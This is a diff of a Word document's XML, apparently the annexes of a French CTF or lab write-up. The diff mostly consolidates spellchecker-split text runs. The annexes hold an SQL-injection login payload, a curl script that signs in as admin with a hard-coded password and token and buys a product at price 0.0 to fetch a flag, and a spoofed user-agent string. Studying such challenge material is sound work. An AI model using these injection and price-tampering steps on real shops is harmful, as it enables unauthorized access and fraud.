-        </w:rPr>
-        <w:t>ajax_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>auth.onreadystatechange</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = () =&gt; {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>if(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ajax_auth.readyState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> !== </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>XMLHttpRequest.DONE</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>ajax_auth.readyState !== XMLHttpRequest.DONE)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2677,19 +1562,11 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="es-ES"/>
         </w:rPr>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="es-ES"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>return;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2726,19 +1603,107 @@
         <w:rPr>
           <w:lang w:val="es-ES"/>
         </w:rPr>
-        <w:t xml:space="preserve">id = 'b69e8eff9a76f51ddad849f051127efe625e826c2e4e2bc4f45fe638ccf42616' + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="es-ES"/>
-        </w:rPr>
-        <w:t>ajax_auth.status.toString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="es-ES"/>
+        <w:t>id = 'b69e8eff9a76f51ddad849f051127efe625e826c2e4e2bc4f45fe638ccf42616' + ajax_auth.status.toString();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>};</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ajax_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>auth.open</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>('GET', 'index.php?request=get_authentication_code', true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ajax_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>auth.setRequestHeader</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>('Content-Type', 'application/x-www-form-urlencoded');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ajax_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>auth.send</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>();</w:t>
       </w:r>
@@ -2751,490 +1716,254 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>};</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ajax_</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- annexe </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>auth.open</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>3 :</w:t>
+      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>('GET', '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>index.php?request</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>get_authentication_code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>', true);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ajax_</w:t>
+        <w:t xml:space="preserve"> injection SQL :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>1' OR '1' = '1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- annexe </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>auth.setRequestHeader</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>4 :</w:t>
+      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>('Content-Type', 'application/x-www-form-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>urlencoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ajax_</w:t>
+        <w:t xml:space="preserve"> télécharger drapeau :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>VERSION=1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>PASSWORD=theophile0910</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>TOKEN_HASH=b69e8eff9a76f51ddad849f051127efe625e826c2e4e2bc4f45fe638ccf42616</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>RAND_CODE=$(curl --cookie-jar cookie.txt -I https://web-dev.dynamic-dns.net/?request=get_authentication_code | grep HTTP/1.1 | awk -F ' ' '{print $2}')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>curl --cookie cookie.txt -A "Mozilla/5.0 ? id:BuyExpress/${VERSION}/A1548S968D2563" -X POST -F 'login=admin' -F "password=${PASSWORD}" -F "id=${TOKEN_HASH}${RAND_CODE}" https://web-dev.dynamic-dns.net/?request=sign_in</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>curl --cookie cookie.txt -X POST -F 'id=4' -F 'quantity=1' -F 'price=0.0' https://web-dev.dynamic-dns.net/?request=buy_product | tail -n +2 &gt; flag.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>rm -f cookie.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">annexe </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>auth.send</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>5 :</w:t>
+      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- annexe </w:t>
+        <w:t xml:space="preserve"> exemple d’user agent :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mozilla/5.0 (Android; Tablet; rv:19.0) Gecko/19.0 Firefox/19.0? </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>3 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> injection SQL :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>1' OR '1' = '1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- annexe </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>4 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>télécharger</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>drapeau</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>VERSION=1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>PASSWORD=theophile0910</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>TOKEN_HASH=b69e8eff9a76f51ddad849f051127efe625e826c2e4e2bc4f45fe638ccf42616</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>RAND_CODE=$(curl --cookie-jar cookie.txt -I https://web-dev.dynamic-dns.net/?request=get_authentication_code | grep HTTP/1.1 | awk -F ' ' '{print $2}')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>curl --cookie cookie.txt -A "Mozilla/5.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>0 ?</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
         <w:t>id:BuyExpress</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>/${VERSION}/A1548S968D2563" -X POST -F 'login=admin' -F "password=${PASSWORD}" -F "id=${TOKEN_HASH}${RAND_CODE}" https://web-dev.dynamic-dns.net/?request=sign_in</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>curl --cookie cookie.txt -X POST -F 'id=4' -F 'quantity=1' -F 'price=0.0' https://web-dev.dynamic-dns.net/?request=buy_product | tail -n +2 &gt; flag.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>rm -f cookie.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">annexe </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>5 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>exemple</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>d’user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> agent :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Mozilla/5.0 (Android; Tablet; rv:19.0) Gecko/19.0 Firefox/19.0? </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>id:BuyExpress</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
